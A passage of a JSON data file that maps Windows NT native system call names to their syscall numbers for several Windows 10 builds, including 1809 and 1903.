"NtCreateEnlistment": "164", "NtCreateEventPair": "165", "NtCreateIRTimer": "166", "NtCreateIoCompletion": "167", "NtCreateJobObject": "168", "NtCreateJobSet": "169", "NtCreateKeyTransacted": "170", "NtCreateKeyedEvent": "171", "NtCreateLowBoxToken": "172", "NtCreateMailslotFile": "173", "NtCreateMutant": "174", "NtCreateNamedPipeFile": "175", "NtCreatePagingFile": "176", "NtCreatePartition": "177", "NtCreatePort": "178", "NtCreatePrivateNamespace": "179", "NtCreateProcess": "180", "NtCreateProfile": "181", "NtCreateProfileEx": "182", "NtCreateRegistryTransaction": "183", "NtCreateResourceManager": "184", "NtCreateSemaphore": "185", "NtCreateSymbolicLinkObject": "186", "NtCreateThreadEx": "187", "NtCreateTimer": "188", "NtCreateTimer2": "189", "NtCreateToken": "190", "NtCreateTokenEx": "191", "NtCreateTransaction": "192", "NtCreateTransactionManager": "193", "NtCreateUserProcess": "194", "NtCreateWaitCompletionPacket": "195", "NtCreateWaitablePort": "196", "NtCreateWnfStateName": "197", "NtCreateWorkerFactory": "198", "NtDebugActiveProcess": "199", "NtDebugContinue": "200", "NtDeleteAtom": "201", "NtDeleteBootEntry": "202", "NtDeleteDriverEntry": "203", "NtDeleteFile": "204", "NtDeleteKey": "205", "NtDeleteObjectAuditAlarm": "206", "NtDeletePrivateNamespace": "207", "NtDeleteValueKey": "208", "NtDeleteWnfStateData": "209", "NtDeleteWnfStateName": "210", "NtDisableLastKnownGood": "211", "NtDisplayString": "212", "NtDrawText": "213", "NtEnableLastKnownGood": "214", "NtEnumerateBootEntries": "215", "NtEnumerateDriverEntries": "216", "NtEnumerateSystemEnvironmentValuesEx": "217", "NtEnumerateTransactionObject": "218", "NtExtendSection": "219", "NtFilterBootOption": "220", "NtFilterToken": "221", "NtFilterTokenEx": "222", "NtFlushBuffersFileEx": "223", "NtFlushInstallUILanguage": "224", "NtFlushInstructionCache": "225", "NtFlushKey": "226", "NtFlushProcessWriteBuffers": "227", "NtFlushVirtualMemory": "228", "NtFlushWriteBuffer": "229", "NtFreeUserPhysicalPages": "230", "NtFreezeRegistry": "231", "NtFreezeTransactions": "232", "NtGetCachedSigningLevel": "233", "NtGetCompleteWnfStateSubscription": "234", "NtGetContextThread": "235", "NtGetCurrentProcessorNumber": "236", "NtGetCurrentProcessorNumberEx": "237", "NtGetDevicePowerState": "238", "NtGetMUIRegistryInfo": "239", "NtGetNextProcess": "240", "NtGetNextThread": "241", "NtGetNlsSectionPtr": "242", "NtGetNotificationResourceManager": "243", "NtGetWriteWatch": "244", "NtImpersonateAnonymousToken": "245", "NtImpersonateThread": "246", "NtInitializeEnclave": "247", "NtInitializeNlsFiles": "248", "NtInitializeRegistry": "249", "NtInitiatePowerAction": "250", "NtIsSystemResumeAutomatic": "251", "NtIsUILanguageComitted": "252", "NtListenPort": "253", "NtLoadDriver": "254", "NtLoadEnclaveData": "255", "NtLoadHotPatch": "256", "NtLoadKey": "257", "NtLoadKey2": "258", "NtLoadKeyEx": "259", "NtLockFile": "260", "NtLockProductActivationKeys": "261", "NtLockRegistryKey": "262", "NtLockVirtualMemory": "263", "NtMakePermanentObject": "264", "NtMakeTemporaryObject": "265", "NtManagePartition": "266", "NtMapCMFModule": "267", "NtMapUserPhysicalPages": "268", "NtMapViewOfSectionEx": "269", "NtModifyBootEntry": "270", "NtModifyDriverEntry": "271", "NtNotifyChangeDirectoryFile": "272", "NtNotifyChangeDirectoryFileEx": "273", "NtNotifyChangeKey": "274", "NtNotifyChangeMultipleKeys": "275", "NtNotifyChangeSession": "276", "NtOpenEnlistment": "277", "NtOpenEventPair": "278", "NtOpenIoCompletion": "279", "NtOpenJobObject": "280", "NtOpenKeyEx": "281", "NtOpenKeyTransacted": "282", "NtOpenKeyTransactedEx": "283", "NtOpenKeyedEvent": "284", "NtOpenMutant": "285", "NtOpenObjectAuditAlarm": "286", "NtOpenPartition": "287", "NtOpenPrivateNamespace": "288", "NtOpenProcessToken": "289", "NtOpenRegistryTransaction": "290", "NtOpenResourceManager": "291", "NtOpenSemaphore": "292", "NtOpenSession": "293", "NtOpenSymbolicLinkObject": "294", "NtOpenThread": "295", "NtOpenTimer": "296", "NtOpenTransaction": "297", "NtOpenTransactionManager": "298", "NtPlugPlayControl": "299", "NtPrePrepareComplete": "300", "NtPrePrepareEnlistment": "301", "NtPrepareComplete": "302", "NtPrepareEnlistment": "303", "NtPrivilegeCheck": "304", "NtPrivilegeObjectAuditAlarm": "305", "NtPrivilegedServiceAuditAlarm": "306", "NtPropagationComplete": "307", "NtPropagationFailed": "308", "NtPulseEvent": "309", "NtQueryAuxiliaryCounterFrequency": "310", "NtQueryBootEntryOrder": "311", "NtQueryBootOptions": "312", "NtQueryDebugFilterState": "313", "NtQueryDirectoryFileEx": "314", "NtQueryDirectoryObject": "315", "NtQueryDriverEntryOrder": "316", "NtQueryEaFile": "317", "NtQueryFullAttributesFile": "318", "NtQueryInformationAtom": "319", "NtQueryInformationByName": "320", "NtQueryInformationEnlistment": "321", "NtQueryInformationJobObject": "322", "NtQueryInformationPort": "323", "NtQueryInformationResourceManager": "324", "NtQueryInformationTransaction": "325", "NtQueryInformationTransactionManager": "326", "NtQueryInformationWorkerFactory": "327", "NtQueryInstallUILanguage": "328", "NtQueryIntervalProfile": "329", "NtQueryIoCompletion": "330", "NtQueryLicenseValue": "331", "NtQueryMultipleValueKey": "332", "NtQueryMutant": "333", "NtQueryOpenSubKeys": "334", "NtQueryOpenSubKeysEx": "335", "NtQueryPortInformationProcess": "336", "NtQueryQuotaInformationFile": "337", "NtQuerySecurityAttributesToken": "338", "NtQuerySecurityObject": "339", "NtQuerySecurityPolicy": "340", "NtQuerySemaphore": "341", "NtQuerySymbolicLinkObject": "342", "NtQuerySystemEnvironmentValue": "343", "NtQuerySystemEnvironmentValueEx": "344", "NtQuerySystemInformationEx": "345", "NtQueryTimerResolution": "346", "NtQueryWnfStateData": "347", "NtQueryWnfStateNameInformation": "348", "NtQueueApcThreadEx": "349", "NtRaiseException": "350", "NtRaiseHardError": "351", "NtReadOnlyEnlistment": "352", "NtRecoverEnlistment": "353", "NtRecoverResourceManager": "354", "NtRecoverTransactionManager": "355", "NtRegisterProtocolAddressInformation": "356", "NtRegisterThreadTerminatePort": "357", "NtReleaseKeyedEvent": "358", "NtReleaseWorkerFactoryWorker": "359", "NtRemoveIoCompletionEx": "360", "NtRemoveProcessDebug": "361", "NtRenameKey": "362", "NtRenameTransactionManager": "363", "NtReplaceKey": "364", "NtReplacePartitionUnit": "365", "NtReplyWaitReplyPort": "366", "NtRequestPort": "367", "NtResetEvent": "368", "NtResetWriteWatch": "369", "NtRestoreKey": "370", "NtResumeProcess": "371", "NtRevertContainerImpersonation": "372", "NtRollbackComplete": "373", "NtRollbackEnlistment": "374", "NtRollbackRegistryTransaction": "375", "NtRollbackTransaction": "376", "NtRollforwardTransactionManager": "377", "NtSaveKey": "378", "NtSaveKeyEx": "379", "NtSaveMergedKeys": "380", "NtSecureConnectPort": "381", "NtSerializeBoot": "382", "NtSetBootEntryOrder": "383", "NtSetBootOptions": "384", "NtSetCachedSigningLevel": "385", "NtSetCachedSigningLevel2": "386", "NtSetContextThread": "387", "NtSetDebugFilterState": "388", "NtSetDefaultHardErrorPort": "389", "NtSetDefaultLocale": "390", "NtSetDefaultUILanguage": "391", "NtSetDriverEntryOrder": "392", "NtSetEaFile": "393", "NtSetHighEventPair": "394", "NtSetHighWaitLowEventPair": "395", "NtSetIRTimer": "396", "NtSetInformationDebugObject": "397", "NtSetInformationEnlistment": "398", "NtSetInformationJobObject": "399", "NtSetInformationKey": "400", "NtSetInformationResourceManager": "401", "NtSetInformationSymbolicLink": "402", "NtSetInformationToken": "403", "NtSetInformationTransaction": "404", "NtSetInformationTransactionManager": "405", "NtSetInformationVirtualMemory": "406", "NtSetInformationWorkerFactory": "407", "NtSetIntervalProfile": "408", "NtSetIoCompletion": "409", "NtSetIoCompletionEx": "410", "NtSetLdtEntries": "411", "NtSetLowEventPair": "412", "NtSetLowWaitHighEventPair": "413", "NtSetQuotaInformationFile": "414", "NtSetSecurityObject": "415", "NtSetSystemEnvironmentValue": "416", "NtSetSystemEnvironmentValueEx": "417", "NtSetSystemInformation": "418", "NtSetSystemPowerState": "419", "NtSetSystemTime": "420", "NtSetThreadExecutionState": "421", "NtSetTimer2": "422", "NtSetTimerEx": "423", "NtSetTimerResolution": "424", "NtSetUuidSeed": "425", "NtSetVolumeInformationFile": "426", "NtSetWnfProcessNotificationEvent": "427", "NtShutdownSystem": "428", "NtShutdownWorkerFactory": "429", "NtSignalAndWaitForSingleObject": "430", "NtSinglePhaseReject": "431", "NtStartProfile": "432", "NtStopProfile": "433", "NtSubscribeWnfStateChange": "434", "NtSuspendProcess": "435", "NtSuspendThread": "436", "NtSystemDebugControl": "437", "NtTerminateEnclave": "438", "NtTerminateJobObject": "439", "NtTestAlert": "440", "NtThawRegistry": "441", "NtThawTransactions": "442", "NtTraceControl": "443", "NtTranslateFilePath": "444", "NtUmsThreadYield": "445", "NtUnloadDriver": "446", "NtUnloadKey": "447", "NtUnloadKey2": "448", "NtUnloadKeyEx": "449", "NtUnlockFile": "450", "NtUnlockVirtualMemory": "451", "NtUnmapViewOfSectionEx": "452", "NtUnsubscribeWnfStateChange": "453", "NtUpdateWnfStateData": "454", "NtVdmControl": "455", "NtWaitForAlertByThreadId": "456", "NtWaitForDebugEvent": "457", "NtWaitForKeyedEvent": "458", "NtWaitForWorkViaWorkerFactory": "459", "NtWaitHighEventPair": "460", "NtWaitLowEventPair": "461"}, "1809": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAllocateVirtualMemoryEx": "116", "NtAlpcAcceptConnectPort": "117", "NtAlpcCancelMessage": "118", "NtAlpcConnectPort": "119", "NtAlpcConnectPortEx": "120", "NtAlpcCreatePort": "121", "NtAlpcCreatePortSection": "122", "NtAlpcCreateResourceReserve": "123", "NtAlpcCreateSectionView": "124", "NtAlpcCreateSecurityContext": "125", "NtAlpcDeletePortSection": "126", "NtAlpcDeleteResourceReserve": "127", "NtAlpcDeleteSectionView": "128", "NtAlpcDeleteSecurityContext": "129", "NtAlpcDisconnectPort": "130", "NtAlpcImpersonateClientContainerOfPort": "131", "NtAlpcImpersonateClientOfPort": "132", "NtAlpcOpenSenderProcess": "133", "NtAlpcOpenSenderThread": "134", "NtAlpcQueryInformation": "135", "NtAlpcQueryInformationMessage": "136", "NtAlpcRevokeSecurityContext": "137", "NtAlpcSendWaitReceivePort": "138", "NtAlpcSetInformation": "139", "NtAreMappedFilesTheSame": "140", "NtAssignProcessToJobObject": "141", "NtAssociateWaitCompletionPacket": "142", "NtCallEnclave": "143", "NtCancelIoFileEx": "144", "NtCancelSynchronousIoFile": "145", "NtCancelTimer2": "146", "NtCancelWaitCompletionPacket": "147", "NtCommitComplete": "148", "NtCommitEnlistment": "149", "NtCommitRegistryTransaction": "150", "NtCommitTransaction": "151", "NtCompactKeys": "152", "NtCompareObjects": "153", "NtCompareSigningLevels": "154", "NtCompareTokens": "155", "NtCompleteConnectPort": "156", "NtCompressKey": "157", "NtConnectPort": "158", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "159", "NtCreateDebugObject": "160", "NtCreateDirectoryObject": "161", "NtCreateDirectoryObjectEx": "162", "NtCreateEnclave": "163", "NtCreateEnlistment": "164", "NtCreateEventPair": "165", "NtCreateIRTimer": "166", "NtCreateIoCompletion": "167", "NtCreateJobObject": "168", "NtCreateJobSet": "169", "NtCreateKeyTransacted": "170", "NtCreateKeyedEvent": "171", "NtCreateLowBoxToken": "172", "NtCreateMailslotFile": "173", "NtCreateMutant": "174", "NtCreateNamedPipeFile": "175", "NtCreatePagingFile": "176", "NtCreatePartition": "177", "NtCreatePort": "178", "NtCreatePrivateNamespace": "179", "NtCreateProcess": "180", "NtCreateProfile": "181", "NtCreateProfileEx": "182", "NtCreateRegistryTransaction": "183", "NtCreateResourceManager": "184", "NtCreateSectionEx": "185", "NtCreateSemaphore": "186", "NtCreateSymbolicLinkObject": "187", "NtCreateThreadEx": "188", "NtCreateTimer": "189", "NtCreateTimer2": "190", "NtCreateToken": "191", "NtCreateTokenEx": "192", "NtCreateTransaction": "193", "NtCreateTransactionManager": "194", "NtCreateUserProcess": "195", "NtCreateWaitCompletionPacket": "196", "NtCreateWaitablePort": "197", "NtCreateWnfStateName": "198", "NtCreateWorkerFactory": "199", "NtDebugActiveProcess": "200", "NtDebugContinue": "201", "NtDeleteAtom": "202", "NtDeleteBootEntry": "203", "NtDeleteDriverEntry": "204", "NtDeleteFile": "205", "NtDeleteKey": "206", "NtDeleteObjectAuditAlarm": "207", "NtDeletePrivateNamespace": "208", "NtDeleteValueKey": "209", "NtDeleteWnfStateData": "210", "NtDeleteWnfStateName": "211", "NtDisableLastKnownGood": "212", "NtDisplayString": "213", "NtDrawText": "214", "NtEnableLastKnownGood": "215", "NtEnumerateBootEntries": "216", "NtEnumerateDriverEntries": "217", "NtEnumerateSystemEnvironmentValuesEx": "218", "NtEnumerateTransactionObject": "219", "NtExtendSection": "220", "NtFilterBootOption": "221", "NtFilterToken": "222", "NtFilterTokenEx": "223", "NtFlushBuffersFileEx": "224", "NtFlushInstallUILanguage": "225", "NtFlushInstructionCache": "226", "NtFlushKey": "227", "NtFlushProcessWriteBuffers": "228", "NtFlushVirtualMemory": "229", "NtFlushWriteBuffer": "230", "NtFreeUserPhysicalPages": "231", "NtFreezeRegistry": "232", "NtFreezeTransactions": "233", "NtGetCachedSigningLevel": "234", "NtGetCompleteWnfStateSubscription": "235", "NtGetContextThread": "236", "NtGetCurrentProcessorNumber": "237", "NtGetCurrentProcessorNumberEx": "238", "NtGetDevicePowerState": "239", "NtGetMUIRegistryInfo": "240", "NtGetNextProcess": "241", "NtGetNextThread": "242", "NtGetNlsSectionPtr": "243", "NtGetNotificationResourceManager": "244", "NtGetWriteWatch": "245", "NtImpersonateAnonymousToken": "246", "NtImpersonateThread": "247", "NtInitializeEnclave": "248", "NtInitializeNlsFiles": "249", "NtInitializeRegistry": "250", "NtInitiatePowerAction": "251", "NtIsSystemResumeAutomatic": "252", "NtIsUILanguageComitted": "253", "NtListenPort": "254", "NtLoadDriver": "255", "NtLoadEnclaveData": "256", "NtLoadKey": "257", "NtLoadKey2": "258", "NtLoadKeyEx": "259", "NtLockFile": "260", "NtLockProductActivationKeys": "261", "NtLockRegistryKey": "262", "NtLockVirtualMemory": "263", "NtMakePermanentObject": "264", "NtMakeTemporaryObject": "265", "NtManageHotPatch": "266", "NtManagePartition": "267", "NtMapCMFModule": "268", "NtMapUserPhysicalPages": "269", "NtMapViewOfSectionEx": "270", "NtModifyBootEntry": "271", "NtModifyDriverEntry": "272", "NtNotifyChangeDirectoryFile": "273", "NtNotifyChangeDirectoryFileEx": "274", "NtNotifyChangeKey": "275", "NtNotifyChangeMultipleKeys": "276", "NtNotifyChangeSession": "277", "NtOpenEnlistment": "278", "NtOpenEventPair": "279", "NtOpenIoCompletion": "280", "NtOpenJobObject": "281", "NtOpenKeyEx": "282", "NtOpenKeyTransacted": "283", "NtOpenKeyTransactedEx": "284", "NtOpenKeyedEvent": "285", "NtOpenMutant": "286", "NtOpenObjectAuditAlarm": "287", "NtOpenPartition": "288", "NtOpenPrivateNamespace": "289", "NtOpenProcessToken": "290", "NtOpenRegistryTransaction": "291", "NtOpenResourceManager": "292", "NtOpenSemaphore": "293", "NtOpenSession": "294", "NtOpenSymbolicLinkObject": "295", "NtOpenThread": "296", "NtOpenTimer": "297", "NtOpenTransaction": "298", "NtOpenTransactionManager": "299", "NtPlugPlayControl": "300", "NtPrePrepareComplete": "301", "NtPrePrepareEnlistment": "302", "NtPrepareComplete": "303", "NtPrepareEnlistment": "304", "NtPrivilegeCheck": "305", "NtPrivilegeObjectAuditAlarm": "306", "NtPrivilegedServiceAuditAlarm": "307", "NtPropagationComplete": "308", "NtPropagationFailed": "309", "NtPulseEvent": "310", "NtQueryAuxiliaryCounterFrequency": "311", "NtQueryBootEntryOrder": "312", "NtQueryBootOptions": "313", "NtQueryDebugFilterState": "314", "NtQueryDirectoryFileEx": "315", "NtQueryDirectoryObject": "316", "NtQueryDriverEntryOrder": "317", "NtQueryEaFile": "318", "NtQueryFullAttributesFile": "319", "NtQueryInformationAtom": "320", "NtQueryInformationByName": "321", "NtQueryInformationEnlistment": "322", "NtQueryInformationJobObject": "323", "NtQueryInformationPort": "324", "NtQueryInformationResourceManager": "325", "NtQueryInformationTransaction": "326", "NtQueryInformationTransactionManager": "327", "NtQueryInformationWorkerFactory": "328", "NtQueryInstallUILanguage": "329", "NtQueryIntervalProfile": "330", "NtQueryIoCompletion": "331", "NtQueryLicenseValue": "332", "NtQueryMultipleValueKey": "333", "NtQueryMutant": "334", "NtQueryOpenSubKeys": "335", "NtQueryOpenSubKeysEx": "336", "NtQueryPortInformationProcess": "337", "NtQueryQuotaInformationFile": "338", "NtQuerySecurityAttributesToken": "339", "NtQuerySecurityObject": "340", "NtQuerySecurityPolicy": "341", "NtQuerySemaphore": "342", "NtQuerySymbolicLinkObject": "343", "NtQuerySystemEnvironmentValue": "344", "NtQuerySystemEnvironmentValueEx": "345", "NtQuerySystemInformationEx": "346", "NtQueryTimerResolution": "347", "NtQueryWnfStateData": "348", "NtQueryWnfStateNameInformation": "349", "NtQueueApcThreadEx": "350", "NtRaiseException": "351", "NtRaiseHardError": "352", "NtReadOnlyEnlistment": "353", "NtRecoverEnlistment": "354", "NtRecoverResourceManager": "355", "NtRecoverTransactionManager": "356", "NtRegisterProtocolAddressInformation": "357", "NtRegisterThreadTerminatePort": "358", "NtReleaseKeyedEvent": "359", "NtReleaseWorkerFactoryWorker": "360", "NtRemoveIoCompletionEx": "361", "NtRemoveProcessDebug": "362", "NtRenameKey": "363", "NtRenameTransactionManager": "364", "NtReplaceKey": "365", "NtReplacePartitionUnit": "366", "NtReplyWaitReplyPort": "367", "NtRequestPort": "368", "NtResetEvent": "369", "NtResetWriteWatch": "370", "NtRestoreKey": "371", "NtResumeProcess": "372", "NtRevertContainerImpersonation": "373", "NtRollbackComplete": "374", "NtRollbackEnlistment": "375", "NtRollbackRegistryTransaction": "376", "NtRollbackTransaction": "377", "NtRollforwardTransactionManager": "378", "NtSaveKey": "379", "NtSaveKeyEx": "380", "NtSaveMergedKeys": "381", "NtSecureConnectPort": "382", "NtSerializeBoot": "383", "NtSetBootEntryOrder": "384", "NtSetBootOptions": "385", "NtSetCachedSigningLevel": "386", "NtSetCachedSigningLevel2": "387", "NtSetContextThread": "388", "NtSetDebugFilterState": "389", "NtSetDefaultHardErrorPort": "390", "NtSetDefaultLocale": "391", "NtSetDefaultUILanguage": "392", "NtSetDriverEntryOrder": "393", "NtSetEaFile": "394", "NtSetHighEventPair": "395", "NtSetHighWaitLowEventPair": "396", "NtSetIRTimer": "397", "NtSetInformationDebugObject": "398", "NtSetInformationEnlistment": "399", "NtSetInformationJobObject": "400", "NtSetInformationKey": "401", "NtSetInformationResourceManager": "402", "NtSetInformationSymbolicLink": "403", "NtSetInformationToken": "404", "NtSetInformationTransaction": "405", "NtSetInformationTransactionManager": "406", "NtSetInformationVirtualMemory": "407", "NtSetInformationWorkerFactory": "408", "NtSetIntervalProfile": "409", "NtSetIoCompletion": "410", "NtSetIoCompletionEx": "411", "NtSetLdtEntries": "412", "NtSetLowEventPair": "413", "NtSetLowWaitHighEventPair": "414", "NtSetQuotaInformationFile": "415", "NtSetSecurityObject": "416", "NtSetSystemEnvironmentValue": "417", "NtSetSystemEnvironmentValueEx": "418", "NtSetSystemInformation": "419", "NtSetSystemPowerState": "420", "NtSetSystemTime": "421", "NtSetThreadExecutionState": "422", "NtSetTimer2": "423", "NtSetTimerEx": "424", "NtSetTimerResolution": "425", "NtSetUuidSeed": "426", "NtSetVolumeInformationFile": "427", "NtSetWnfProcessNotificationEvent": "428", "NtShutdownSystem": "429", "NtShutdownWorkerFactory": "430", "NtSignalAndWaitForSingleObject": "431", "NtSinglePhaseReject": "432", "NtStartProfile": "433", "NtStopProfile": "434", "NtSubscribeWnfStateChange": "435", "NtSuspendProcess": "436", "NtSuspendThread": "437", "NtSystemDebugControl": "438", "NtTerminateEnclave": "439", "NtTerminateJobObject": "440", "NtTestAlert": "441", "NtThawRegistry": "442", "NtThawTransactions": "443", "NtTraceControl": "444", "NtTranslateFilePath": "445", "NtUmsThreadYield": "446", "NtUnloadDriver": "447", "NtUnloadKey": "448", "NtUnloadKey2": "449", "NtUnloadKeyEx": "450", "NtUnlockFile": "451", "NtUnlockVirtualMemory": "452", "NtUnmapViewOfSectionEx": "453", "NtUnsubscribeWnfStateChange": "454", "NtUpdateWnfStateData": "455", "NtVdmControl": "456", "NtWaitForAlertByThreadId": "457", "NtWaitForDebugEvent": "458", "NtWaitForKeyedEvent": "459", "NtWaitForWorkViaWorkerFactory": "460", "NtWaitHighEventPair": "461", "NtWaitLowEventPair": "462"}, "1903": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAllocateVirtualMemoryEx": "116", "NtAlpcAcceptConnectPort": "117", "NtAlpcCancelMessage": "118", "NtAlpcConnectPort": "119", "NtAlpcConnectPortEx": "120", "NtAlpcCreatePort": "121", "NtAlpcCreatePortSection": "122", "NtAlpcCreateResourceReserve": "123", "NtAlpcCreateSectionView": "124", "NtAlpcCreateSecurityContext": "125", "NtAlpcDeletePortSection": "126", "NtAlpcDeleteResourceReserve": "127", "NtAlpcDeleteSectionView": "128", "NtAlpcDeleteSecurityContext": "129", "NtAlpcDisconnectPort": "130", "NtAlpcImpersonateClientContainerOfPort": "131", "NtAlpcImpersonateClientOfPort": "132", "NtAlpcOpenSenderProcess": "133", "NtAlpcOpenSenderThread": "134", "NtAlpcQueryInformation": "135", "NtAlpcQueryInformationMessage": "136", "NtAlpcRevokeSecurityContext": "137", "NtAlpcSendWaitReceivePort": "138", "NtAlpcSetInformation": "139", "NtAreMappedFilesTheSame": "140", "NtAssignProcessToJobObject": "141", "NtAssociateWaitCompletionPacket": "142", "NtCallEnclave": "143", "NtCancelIoFileEx": "144", "NtCancelSynchronousIoFile": "145", "NtCancelTimer2": "146", "NtCancelWaitCompletionPacket": "147", "NtCommitComplete": "148", "NtCommitEnlistment": "149", "NtCommitRegistryTransaction": "150", "NtCommitTransaction": "151", "NtCompactKeys": "152", "NtCompareObjects": "153", "NtCompareSigningLevels": "154", "NtCompareTokens": "155", "NtCompleteConnectPort": "156", "NtCompressKey": "157", "NtConnectPort": "158", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "159", "NtCreateCrossVmEvent": "160", "NtCreateDebugObject": "161", "NtCreateDirectoryObject": "162", 